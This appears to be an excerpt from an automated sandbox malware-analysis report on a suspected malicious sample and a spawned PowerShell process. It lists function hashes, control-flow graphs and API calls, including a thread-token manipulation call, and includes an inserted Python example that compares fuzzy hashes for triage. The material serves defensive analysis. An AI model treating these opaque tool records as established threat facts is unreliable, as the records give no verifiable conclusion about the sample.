                                                                                                      • Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2538663250-0
                                                                                                      • Opcode ID: 584c82f153e2ebf482d9627f864950d3a9730cd4fc0b36310949e869e56585b5
                                                                                                      • Instruction ID: cef31b232876baab642992f8d972ded527e799e1491b71f40cd86dfddaa13b44
                                                                                                      • Opcode Fuzzy Hash: 584c82f153e2ebf482d9627f864950d3a9730cd4fc0b36310949e869e56585b5
                                                                                                      • Instruction Fuzzy Hash: 271133B48003088FDB20DF9AD544BDEBBF4EB48320F208459D518A7210D374A944CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • OleInitialize.OLE32(00000000), ref: 067E6DED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2538663250-0
                                                                                                      • Opcode ID: 88ba94c149b13ea820d674745cfca25bf1cd9a40fa97cc51a69cf911c79a8f4e
                                                                                                      • Instruction ID: e1c470e836bb218cd9dcf9b205a3644aafc194af9d8436e488dc5f811fd12d43
                                                                                                      • Opcode Fuzzy Hash: 88ba94c149b13ea820d674745cfca25bf1cd9a40fa97cc51a69cf911c79a8f4e
                                                                                                      • Instruction Fuzzy Hash: 441123B5C00248CFDB60DFAAD449BDEBBF4EB48324F20845AD558A7210D378AA44CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatchMessage
                                                                                                      • String ID:
                                                                                                      • API String ID: 2061451462-0
                                                                                                      • Opcode ID: 2dd9c5a21853c392ce1902ce90564902bec184d3a9ac2f0735f66cdb5cf50879
                                                                                                      • Instruction ID: 0f3bdf23c7f38f9a267e6f7bddf968b2dfaf3fe8a1ae591666ca6a62b80dff28
                                                                                                      • Opcode Fuzzy Hash: 2dd9c5a21853c392ce1902ce90564902bec184d3a9ac2f0735f66cdb5cf50879
                                                                                                      • Instruction Fuzzy Hash: A211EDB1D002498FDB24DF9AD844B9EFBF4AB49324F10856AD858A7610C379A944CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatchMessage
                                                                                                      • String ID:
                                                                                                      • API String ID: 2061451462-0
                                                                                                      • Opcode ID: 2ad37bc1ffa0b730d9372d636398f432815b47c5a34aaba4e972837e4f82d9fa
                                                                                                      • Instruction ID: deb5710eef12fb3d56bf1f98beccc37fb3147329c2d259025754116131366ff3
                                                                                                      • Opcode Fuzzy Hash: 2ad37bc1ffa0b730d9372d636398f432815b47c5a34aaba4e972837e4f82d9fa
                                                                                                      • Instruction Fuzzy Hash: 93110DB1C00249CFCB10DF9AD844BDEFBF4EB48324F10842AD858A7210C378AA44CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1798811759.00000000029DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029DD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_29dd000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 26a679efcab4c2707ec0280bfad58fdb49b7990d15fdccf58d6119f758b1698d
                                                                                                      • Instruction ID: 57f87f2920259b094b273a99c6d4cb151d93c872caa578e613d477cad0d94e4a
                                                                                                      • Opcode Fuzzy Hash: 26a679efcab4c2707ec0280bfad58fdb49b7990d15fdccf58d6119f758b1698d
                                                                                                      • Instruction Fuzzy Hash: F321F272604200DFDB14DF24D984B26BBA9EBC8314F64C969D80A4B296C33AD447DA71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1798811759.00000000029DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029DD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_29dd000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 774818c41e20079d1e0f120d896ca367bb0eb2cb3f2a6a6db7fa6328895d9e73
                                                                                                      • Instruction ID: d6addad9ed174f56b392c93a2086a5e34414e398e748951e7d8fb3419336afba
                                                                                                      • Opcode Fuzzy Hash: 774818c41e20079d1e0f120d896ca367bb0eb2cb3f2a6a6db7fa6328895d9e73
                                                                                                      • Instruction Fuzzy Hash: 01212772504244DFDB04DF14DAC4B2AFBA9FB84328F24CA69D9494B245C33AD446DAB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1798811759.00000000029DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029DD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_29dd000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 80b7c211c4424d45eaba5c5bec5d6ec8399e6097d0028a3e39a758bc966b8be8
                                                                                                      • Instruction ID: 8daab08cc15df9750ee6921eddc487eb7d39ef775cb46a14a3b4c34b1ea1a5b7
                                                                                                      • Opcode Fuzzy Hash: 80b7c211c4424d45eaba5c5bec5d6ec8399e6097d0028a3e39a758bc966b8be8
                                                                                                      • Instruction Fuzzy Hash: 3A21C6755093C08FCB12CF24D994715BF71EB85214F28C5DAD8498F697C33AD40ACB62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1798811759.00000000029DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029DD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_29dd000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                      • Instruction ID: 82a6c0e8a3d85c0c2006be61e781f413cba478a9622eba76e7dad5cc49b745a3
                                                                                                      • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                      • Instruction Fuzzy Hash: 5C11C176504280CFDB16CF14D5C4B1AFF71FB84328F28C6AAD8494B656C33AD40ADBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1798595421.00000000029CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029CD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_29cd000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ce2752523331bfd8ea7a8fda5ea171b6a30bb18fb71ef7b64f49ccdd47e3d256
                                                                                                      • Instruction ID: 8ab95931298d9a0ee5816c47124928773592f846b56760c8545c4b4e97807c76
                                                                                                      • Opcode Fuzzy Hash: ce2752523331bfd8ea7a8fda5ea171b6a30bb18fb71ef7b64f49ccdd47e3d256
                                                                                                      • Instruction Fuzzy Hash: 1F01A2711097409AE710AA29DA84767BF9CEF45364F28C83EED0D4A286C7799840CAB3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1798595421.00000000029CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029CD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_29cd000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3d638616aa3fa68596610704685e8e9f3f70af53f7601138eb714505a46fa4b1
                                                                                                      • Instruction ID: 2ce5796571c230f9fd4eea4d276724ce064227e9f9b2d3edb806cbc2dbd28c26
                                                                                                      • Opcode Fuzzy Hash: 3d638616aa3fa68596610704685e8e9f3f70af53f7601138eb714505a46fa4b1
                                                                                                      • Instruction Fuzzy Hash: 7AF062714043849AE7109A1AC9C4B62FFACEB45664F28C45AED4C4A286C379A844CA71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e75130591e60485901df8a6a731a89220f56339dd421b06f4ed423fc41bccbb3
                                                                                                      • Instruction ID: ef91ed152a0bab77c53a09a3e5bf11d04e5dbc4eb4a8a4a7d4b0f67e6c67ddba
                                                                                                      • Opcode Fuzzy Hash: e75130591e60485901df8a6a731a89220f56339dd421b06f4ed423fc41bccbb3
                                                                                                      • Instruction Fuzzy Hash: 6E1282B0C81745CADB30CF65E95C98D3BA1BB4539CBD08A09D2616F3E1DBB811AACF44
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e92215fb13a8f841e86721af86f4a8e7a22345e3c8ccbcfc5c6a19d1974df465
                                                                                                      • Instruction ID: 4ad2fac9b40574563483030b0d068ebeae3f6f77bf82cf9e57f92926dab10163
                                                                                                      • Opcode Fuzzy Hash: e92215fb13a8f841e86721af86f4a8e7a22345e3c8ccbcfc5c6a19d1974df465
                                                                                                      • Instruction Fuzzy Hash: 40A15D32E00219CFCF15EFB4C8805AEBBB2FF85304B5545AAE909AB265DB31E955CF50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 99d1908d430076de95981dea8079c87fda677737f9faeafb85acd84d428d9baf
                                                                                                      • Instruction ID: 036154ce6e338975671e7bccd856cc899c2e195141ff11950b0adac5d5857e85
                                                                                                      • Opcode Fuzzy Hash: 99d1908d430076de95981dea8079c87fda677737f9faeafb85acd84d428d9baf
                                                                                                      • Instruction Fuzzy Hash: E5C129B0C80745CBDB21CF24E85858D7BB1BB8539CF958B09D2616F2E1DBB814AACF44
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%
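
The records above list one Instruction Fuzzy Hash per recovered function; the two OleInitialize stubs and the two DispatchMessage stubs, for instance, carry distinct Opcode IDs but near-identical fuzzy hashes. The Python below is an added example, not Joe Sandbox code and not part of this report: it parses four of the records (copied verbatim as constructed input), groups them by API ID and ranks record pairs by a simple position-wise nibble match. That metric is an assumption chosen for illustration; it is not the scoring behind the report's Similarity or Uniqueness fields.

```python
"""Parse Joe Sandbox function-similarity records and compare their
Instruction Fuzzy Hashes.

Added example, not Joe Sandbox code. The position-wise nibble match used
below is an assumed, illustrative metric and is NOT the algorithm behind
the report's Similarity / Uniqueness fields.
"""
import re
from collections import defaultdict

# Constructed input: four records copied from the report, trimmed to the
# fields this example reads. A blank line separates records.
SAMPLE_RECORDS = """\
• Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
• API ID: MessageSend
• Opcode ID: f147e9cc283f09fcc5b8c75473f0c810c188dd0385bb47c7ab954e60091ad063
• Instruction Fuzzy Hash: A01103B5800309DFDB50DF99D985BDEBBF8EB48310F10841AE958A7610C374A984CFA1

• Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
• API ID: Initialize
• Opcode ID: 584c82f153e2ebf482d9627f864950d3a9730cd4fc0b36310949e869e56585b5
• Instruction Fuzzy Hash: 271133B48003088FDB20DF9AD544BDEBBF4EB48320F208459D518A7210D374A944CFA5

• Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
• API ID: Initialize
• Opcode ID: 88ba94c149b13ea820d674745cfca25bf1cd9a40fa97cc51a69cf911c79a8f4e
• Instruction Fuzzy Hash: 441123B5C00248CFDB60DFAAD449BDEBBF4EB48324F20845AD558A7210D378AA44CFA5

• Source File: 00000000.00000002.1798811759.00000000029DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029DD000, based on PE: false
• API ID:
• Opcode ID: 26a679efcab4c2707ec0280bfad58fdb49b7990d15fdccf58d6119f758b1698d
• Instruction Fuzzy Hash: F321F272604200DFDB14DF24D984B26BBA9EBC8314F64C969D80A4B296C33AD447DA71
"""

# "• Key: value" bullet line; the key stops at the first colon.
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")


def parse_records(text):
    """Split bullet-list text into one dict per record (blank line = separator)."""
    records, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        m = FIELD_RE.match(line.strip())
        if m:
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "Source File":
                # "...sdmp, Offset: ..., based on PE: false" -> keep the dump name only
                value = value.split(",")[0]
            current[key] = value
    if current:
        records.append(current)
    return records


def nibble_similarity(a, b):
    """Fraction of hex positions that agree; the shorter hash is space-padded
    so unmatched tail positions count as mismatches (assumed metric)."""
    n = max(len(a), len(b))
    if n == 0:
        return 0.0
    matches = sum(1 for x, y in zip(a.ljust(n), b.ljust(n)) if x == y)
    return matches / n


def group_by_api(records):
    """Map API ID -> list of Opcode IDs; records with an empty API ID go under '(none)'."""
    groups = defaultdict(list)
    for r in records:
        groups[r.get("API ID") or "(none)"].append(r["Opcode ID"])
    return dict(groups)


def most_similar_pair(records):
    """Return (opcode_a, opcode_b, score) for the two records whose hashes agree most."""
    best = None
    for i in range(len(records)):
        for j in range(i + 1, len(records)):
            s = nibble_similarity(records[i]["Instruction Fuzzy Hash"],
                                  records[j]["Instruction Fuzzy Hash"])
            if best is None or s > best[2]:
                best = (records[i]["Opcode ID"], records[j]["Opcode ID"], s)
    return best


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for api, ids in group_by_api(recs).items():
        print(f"{api}: {len(ids)} function(s)")
    a, b, score = most_similar_pair(recs)
    print(f"closest pair: {a[:12]}.. / {b[:12]}.. similarity={score:.3f}")
```

On these four records the closest pair is the two OleInitialize stubs at 53 of 70 matching positions, while the unnamed function from the 029DD000 dump sits far from all three API stubs; that is the kind of grouping a triager uses to skip near-duplicate P/Invoke thunks and concentrate on the functions that are actually distinct.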

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:6.8%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:3
                                                                                                      Total number of Limit Nodes:0
execution_graph
• Node 22253: 8806428
• Node 22254: 880646b SetThreadToken
• Node 22255: 8806499
• Edges: 22253->22254, 22254->22255

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
control_flow_graph
• Block 860: 4f5b471-4f5b4a9
• Block 862: 4f5b4ae-4f5b7e9 (call 4f5acbc)
• Block 863: 4f5b4ab
• Block 924: 4f5b7ee-4f5b7f5
• Edges: 860->862, 860->863, 862->924, 863->862
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6fe319d2fcf327e49e18bc7f052a5162122622a2a1672491e39b0aa3b18540eb
                                                                                                      • Instruction ID: e3ff4759f5c257da257d0e2583039f9170501abaf85c0836fd77042cb581eab2
                                                                                                      • Opcode Fuzzy Hash: 6fe319d2fcf327e49e18bc7f052a5162122622a2a1672491e39b0aa3b18540eb
                                                                                                      • Instruction Fuzzy Hash: 74914271A006159FEF1AEFA4C4145AEB7E2EFC4604B018A1DD50AAB350DF74AD0B8BD6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 925 4f5b490-4f5b4a9 926 4f5b4ae-4f5b7e9 call 4f5acbc 925->926 927 4f5b4ab 925->927 988 4f5b7ee-4f5b7f5 926->988 927->926
Memory Dump Source
• Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fe54a332e5aec54a49425568145a96d1868c6fa40d6bb1c5d499976b031329ae
• Instruction ID: 2107ff7322a2bef6974153b566d8a34878b093a45099f0f709beee8e9b4a216b
• Opcode Fuzzy Hash: fe54a332e5aec54a49425568145a96d1868c6fa40d6bb1c5d499976b031329ae
• Instruction Fuzzy Hash: 99915171B006159BEF1AEFA484145AFB7E2EFC4604B018A1DD50AAB350DF74AD0B8BD6
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$JJl$JJl$JJl$JJl$JJl$JJl$rIl$rIl
• API String ID: 0-2055014725
• Opcode ID: 000d2042e7d3015d3e718eaf2c47e32bd2b4f3c12e29a706e3a1179e940a89c0
• Instruction ID: a8ba998d3edde4ac25c15d0a914c625ac891e10a7bd8f6901f631f76f98b87de
• Opcode Fuzzy Hash: 000d2042e7d3015d3e718eaf2c47e32bd2b4f3c12e29a706e3a1179e940a89c0
• Instruction Fuzzy Hash: 32224BB5B20206CFCB15CF688408AAABBE9BF89318F14847AD915CB3D5DB31D945C7E1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 209 7903ce8-7903d0d 210 7903f00-7903f0a 209->210 211 7903d13-7903d18 209->211 221 7903f13-7903f4a 210->221 222 7903f0c-7903f11 210->222 212 7903d30-7903d34 211->212 213 7903d1a-7903d20 211->213 216 7903eb0-7903eba 212->216 217 7903d3a-7903d3c 212->217 214 7903d22 213->214 215 7903d24-7903d2e 213->215 214->212 215->212 223 7903ec8-7903ece 216->223 224 7903ebc-7903ec5 216->224 219 7903d4c 217->219 220 7903d3e-7903d4a 217->220 226 7903d4e-7903d50 219->226 220->226 227 7903f50-7903f55 221->227 228 79040ce-79040d6 221->228 222->221 229 7903ed0-7903ed2 223->229 230 7903ed4-7903ee0 223->230 226->216 232 7903d56-7903d75 226->232 233 7903f57-7903f5d 227->233 234 7903f6d-7903f71 227->234 241 79040d8-79040de 228->241 242 79040df-7904112 228->242 231 7903ee2-7903efd 229->231 230->231 261 7903d85 232->261 262 7903d77-7903d83 232->262 239 7903f61-7903f6b 233->239 240 7903f5f 233->240 237 7904080-790408a 234->237 238 7903f77-7903f79 234->238 244 7904097-790409d 237->244 245 790408c-7904094 237->245 246 7903f89 238->246 247 7903f7b-7903f87 238->247 239->234 240->234 241->242 250 7904228-7904232 242->250 251 7904118-790411d 242->251 253 79040a3-79040af 244->253 254 790409f-79040a1 244->254 252 7903f8b-7903f8d 246->252 247->252 274 7904234-790423a 250->274 275 790423b-790424c 250->275 256 7904135-7904139 251->256 257 790411f-7904125 251->257 252->237 259 7903f93-7903fb2 252->259 260 79040b1-79040cb 253->260 254->260 266 79041da 256->266 267 790413f-7904141 256->267 263 7904127 257->263 264 7904129-7904133 257->264 298 7903fc2 259->298 299 7903fb4-7903fc0 259->299 269 7903d87-7903d89 261->269 262->269 263->256 264->256 276 79041db-79041e4 266->276 271 7904151 267->271 272 7904143-790414f 267->272 269->216 280 7903d8f-7903d96 269->280 282 7904153-7904155 271->282 272->282 274->275 275->276 277 790424e 275->277 278 79041f1-79041f7 276->278 279 79041e6-79041ee 276->279 284 7904250-7904255 277->284 285 7904257-790425d 277->285 286 79041f9-79041fb 278->286 287 79041fd-7904209 278->287 280->210 288 7903d9c-7903da1 280->288 282->266 283 790415b-790415d 282->283 291 7904177-790417e 283->291 292 790415f-7904165 283->292 284->285 293 790428b-7904295 285->293 294 790425f-7904281 285->294 295 790420b-7904225 286->295 287->295 296 7903da3-7903da9 288->296 297 7903db9-7903dc8 288->297 303 7904180-7904186 291->303 304 7904196-79041d7 291->304 300 7904167 292->300 301 7904169-7904175 292->301 307 7904297-790429c 293->307 308 790429f-79042a5 293->308 329 7904283-7904288 294->329 330 79042d5-79042fe 294->330 305 7903dab 296->305 306 7903dad-7903db7 296->306 297->216 321 7903dce-7903dec 297->321 309 7903fc4-7903fc6 298->309 299->309 300->291 301->291 311 7904188 303->311 312 790418a-7904194 303->312 305->297 306->297 314 79042a7-79042a9 308->314 315 79042ab-79042b7 308->315 309->237 317 7903fcc-7904003 309->317 311->304 312->304 322 79042b9-79042d2 314->322 315->322 338 7904005-790400b 317->338 339 790401d-7904024 317->339 321->216 336 7903df2-7903e17 321->336 344 7904300-7904326 330->344 345 790432d-790435c 330->345 336->216 358 7903e1d-7903e24 336->358 342 790400d 338->342 343 790400f-790401b 338->343 346 7904026-790402c 339->346 347 790403c-790407d 339->347 342->339 343->339 344->345 356 7904395-790439f 345->356 357 790435e-790437b 345->357 349 7904030-790403a 346->349 350 790402e 346->350 349->347 350->347 361 79043a1-79043a5 356->361 362 79043a8-79043ae 356->362 369 79043e5-79043ea 357->369 370 790437d-790438f 357->370 359 7903e26-7903e41 358->359 360 7903e6a-7903e9d 358->360 372 7903e43-7903e49 359->372 373 7903e5b-7903e5f 359->373 384 7903ea4-7903ead 360->384 365 79043b0-79043b2 362->365 366 79043b4-79043c0 362->366 367 79043c2-79043e2 365->367 366->367 369->370 370->356 378 7903e4b 372->378 379 7903e4d-7903e59 372->379 380 7903e66-7903e68 373->380 378->373 379->373 380->384
Strings
Memory Dump Source
• Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$4'^q$4'^q
• API String ID: 0-1420252700
• Opcode ID: 6fb78a6bcdc3ebcdb98e2a7c448ab2dc49f06c7e94624bfbcee283463035d4a6
• Instruction ID: 52377fae559fee6a42c8099bfcae4a34058f03c2416f93fabc89079ab888a19a
• Opcode Fuzzy Hash: 6fb78a6bcdc3ebcdb98e2a7c448ab2dc49f06c7e94624bfbcee283463035d4a6
• Instruction Fuzzy Hash: 921258B17202558FCB158B788811A6ABFBAAFD6358F14847AD605CF2A1DB31CC45C7E2
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 499 79017b8-79017da 500 79017e0-79017e5 499->500 501 7901969-7901985 499->501 502 79017e7-79017ed 500->502 503 79017fd-7901801 500->503 511 7901911 501->511 512 7901987-79019b5 501->512 504 79017f1-79017fb 502->504 505 79017ef 502->505 506 7901914-790191e 503->506 507 7901807-790180b 503->507 504->503 505->503 513 7901920-7901929 506->513 514 790192c-7901932 506->514 509 790184b 507->509 510 790180d-790181e 507->510 520 790184d-790184f 509->520 510->501 530 7901824-7901829 510->530 518 7901b04-7901b0e 512->518 519 79019bb-79019c0 512->519 515 7901934-7901936 514->515 516 7901938-7901944 514->516 521 7901946-7901966 515->521 516->521 534 7901b10-7901b15 518->534 535 7901b17-7901b21 518->535 524 79019c2-79019c8 519->524 525 79019d8-79019dc 519->525 520->506 523 7901855-7901859 520->523 523->506 531 790185f-7901863 523->531 532 79019ca 524->532 533 79019cc-79019d6 524->533 528 79019e2-79019e4 525->528 529 7901ab4-7901abe 525->529 536 79019f4 528->536 537 79019e6-79019f2 528->537 539 7901ac0-7901ac9 529->539 540 7901acc-7901ad2 529->540 541 7901841-7901849 530->541 542 790182b-7901831 530->542 543 7901865-790186e 531->543 544 7901886 531->544 532->525 533->525 534->535 547 7901aad-7901ab1 535->547 546 79019f6-79019f8 536->546 537->546 551 7901ad4-7901ad6 540->551 552 7901ad8-7901ae4 540->552 541->520 549 7901833 542->549 550 7901835-790183f 542->550 553 7901870-7901873 543->553 554 7901875-7901882 543->554 548 7901889-7901910 544->548 546->529 555 79019fe-7901a16 546->555 548->511 549->541 550->541 557 7901ae6-7901b01 551->557 552->557 558 7901884 553->558 554->558 566 7901a30-7901a34 555->566 567 7901a18-7901a1e 555->567 558->548 572 7901a3a-7901a41 566->572 570 7901a20 567->570 571 7901a22-7901a2e 567->571 570->566 571->566 573 7901a43-7901a46 572->573 574 7901a48-7901aa5 572->574 576 7901aaa 573->576 574->576 576->547
Strings
Memory Dump Source
• Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
Similarity
• API ID:
• String ID: ?l$?l
• API String ID: 0-322553749
• Opcode ID: 56a64b591692239a1a51107bb1ed8b4392efec419198a133f763b55ba3d4da71
• Instruction ID: 4cefd05671d8f3c28184810480d882f491283b5288932a29878c069b08da9748
• Opcode Fuzzy Hash: 56a64b591692239a1a51107bb1ed8b4392efec419198a133f763b55ba3d4da71
• Instruction Fuzzy Hash: C8B187B1B9020DCFCB148B69D400AAEBBEAAFC5314F14C47AD415CB295DB31D941C7E1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 584 8806421-8806463 585 880646b-8806497 SetThreadToken 584->585 586 88064a0-88064bd 585->586 587 8806499-880649f 585->587 587->586
APIs
• SetThreadToken.KERNELBASE(EFD80869), ref: 0880648A
Memory Dump Source
• Source File: 00000001.00000002.1720262827.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_8800000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
• Opcode ID: 13c3a8d48ab4ebd910f29dc04a831723d604c1dabf0f919a8de30e97255eacc6
• Instruction ID: 397f6ff6654608e07f45acb5fb18f0467eebd7b1d20be02b89f9e17a420d752f
• Opcode Fuzzy Hash: 13c3a8d48ab4ebd910f29dc04a831723d604c1dabf0f919a8de30e97255eacc6
• Instruction Fuzzy Hash: 021125B59002488FCB50DF9AC984BDEFBF4EB88324F14841AE059A7350D774A944CFA4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 590 8806428-8806497 SetThreadToken 592 88064a0-88064bd 590->592 593 8806499-880649f 590->593 593->592
APIs
• SetThreadToken.KERNELBASE(EFD80869), ref: 0880648A
Memory Dump Source
• Source File: 00000001.00000002.1720262827.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
Joe Sandbox IDA Plugin
